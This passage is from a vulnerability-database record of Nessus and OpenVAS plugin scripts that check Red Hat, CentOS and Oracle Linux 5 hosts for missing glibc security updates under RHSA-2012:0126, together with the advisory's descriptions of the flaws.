(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0126\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["references", "modified", "sourceData"], "edition": 8, "lastseen": "2018-11-13T16:43:08"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "ae0665ae2f88d638e0907d932dfcc493"}, {"key": "cvelist", "hash": "6f8115c44826ba13de903bb0d26a7d5b"}, {"key": "cvss", "hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9"}, {"key": "description", "hash": "3b8c691033965f21d52156be71d1a3fb"}, {"key": "href", "hash": "c4f16ed276157b63b39f28c10395355d"}, {"key": "modified", "hash": "11adcfef0c4ad5230059a01cdd38d503"}, {"key": "naslFamily", "hash": "b46559ea68ec9a13474c3a7776817cfd"}, {"key": "pluginID", "hash": "3b4231700df65bd1e280187eabbb0395"}, {"key": "published", "hash": "7c885de43ac8c8fec677c5a50f1ca9e9"}, {"key": "references", "hash": "d0d3aea83b783517cc9a19726c25ed46"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "5d7243372141ed373d53af4ba405ac9c"}, {"key": "title", "hash": "2c579aa4e476f52de92baf9b41b1db07"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "e33bde0128c9d5a33171ae08130ea7ffdc09a3643d44f977fd55b26191e69bf2", "viewCount": 6, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0126\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "57929", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"]}

{"openvas": [{"lastseen": "2018-09-01T23:59:23", "references": ["http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html", "2012:0126"], "pluginID": "1361412562310881084", "description": "Check for the Version of glibc", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "title": "CentOS Update for glibc CESA-2012:0126 centos5 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310881084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0126 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n \n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n \n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881084\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:03:45 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0126\");\n script_name(\"CentOS Update for glibc CESA-2012:0126 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:42", "references": ["http://linux.oracle.com/errata/ELSA-2012-0126.html"], "pluginID": "1361412562310123990", "description": "Oracle Linux Local Security Checks ELSA-2012-0126", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2012-0126", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123990", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123990", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0126.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123990\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0126\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0126 - glibc security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0126\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0126.html\");\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\", \"CVE-2010-0830\", \"CVE-2009-5029\", \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T10:57:03", "references": ["https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html", "2012:0126-01"], "pluginID": "870556", "description": "Check for the Version of glibc", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-02-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "RedHat Update for glibc RHSA-2012:0126-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-01-03T00:00:00", "href": 